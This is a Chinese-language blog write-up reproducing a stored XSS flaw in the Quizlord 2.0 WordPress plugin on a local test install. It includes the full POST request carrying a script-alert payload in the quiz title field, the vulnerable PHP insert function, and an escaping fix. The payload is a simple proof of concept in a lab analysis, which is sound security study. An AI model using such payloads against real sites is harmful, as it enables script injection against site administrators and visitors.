【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析（wordpress伪原创插件）

【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析（wordpress伪原创插件）

年后趁着需要做安全测试系统不多的这个空档，学学python到处逛逛复现复现和分析一些简单的漏洞--from Lyricbao

0x00 复现环境

phpstudy wordpress 4.4版本 Quizlord 2.0版本

貌似WordPress爆出漏洞的通常基本大多都是它的插件存在安全问题。

0x01步骤

使用phpstudy搭建环境，搭建wordpress，然后登陆进后台去下载Quizlord插件，版本为2.0一切就绪后就开始看怎么触发的XSS了

3) At the title type: poc"> , then fill the remaining fields and click Save. --from exploit-db

XSS注入点：title

request包

POST /wp4.4/wordpress/wp-admin/admin.php HTTP/1.1 Host: localhost Content-Length: 184 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/wp4.4/wordpress/wp-admin/admin.php?page=quizlord Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: wordpress_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7C43a2436e074320bb113475ff8e44222065a4454e602d990d36639085856f0dd3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7Cf23acf621ce28dbfc8f0baf9abe31370d3fc5674ca575a4ba1029832ca552c62; wp-settings-time-1=1550197219; pgv_pvi=4214545408; Phpstorm-c3dafaf3=cd60577d-e9ad-4825-b2e4-7a109a7e2faf; PHPSESSID=8v8jf1s93dprjgq4bpo29ldsq7 Connection: close action=ql_insert&title=%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=1&time=0&numbtype=numerical&numbmark=1&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save

效果当然是触发啊 代码里一点过滤都没有 这算一个存储型XSS

0x02漏洞原理分析

知其然要知其所以然，下面我们来看问题出现在哪个环节进入Quizlord插件目录，找到quizlord.php，打开出问题的是这段函数 title没有被过滤盒转义就直接写进数据库里面了

function ql_insert_quiz_data(){ global $wpdb; if(!empty($_POST['title'])){ $ql_title = $_POST['title']; $ql_description = $_POST['description']; $ql_time = $_POST['time']; $ql_rightcolor = "#".$_POST['rightcolor']; $ql_wrongcolor = "#".$_POST['wrongcolor']; $ql_numbtype = $_POST['numbtype']; $ql_numbmark = $_POST['numbmark']; $ql_showtype = $_POST['showtype']; $ql_random = isset($_POST['random']) ? 1 : 0; $ql_skip = isset($_POST['skip']) ? 1 : 0; $ql_resume = isset($_POST['resume']) ? 1 : 0; $ql_backbtn = isset($_POST['backbtn']) ? 1 : 0; $ql_autoload = isset($_POST['autoload']) ? 1 : 0; $ql_checkcnt = isset($_POST['checkcnt']) ? 1 : 0; $wpdb->insert($wpdb->prefix.'ql_quizzes', array( 'name' => $ql_title, 'description' => $ql_description, 'time' => $ql_time, 'right_color' => $ql_rightcolor, 'wrong_color' => $ql_wrongcolor, 'numbering_type' => $ql_numbtype, 'numbering_mark' => $ql_numbmark, 'show_type' => $ql_showtype, 'random' => $ql_random, 'skip' => $ql_skip, 'resume' => $ql_resume, 'autoload' => $ql_autoload, 'back_button' => $ql_backbtn, 'check_continue' => $ql_checkcnt )); } wp_redirect($_SERVER['HTTP_REFERER']); exit(); } add_action('admin_action_ql_insert', 'ql_insert_quiz_data');

0x03 漏洞PoC

待写

0x04 漏洞修复

利用htmlentities()函数转义html实体。

这样的情况最好在输入输出点都做转义，这样就保障得多了0x05 Reference

详细的漏洞细节以及复现方法 中文版的这哥们也写了

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。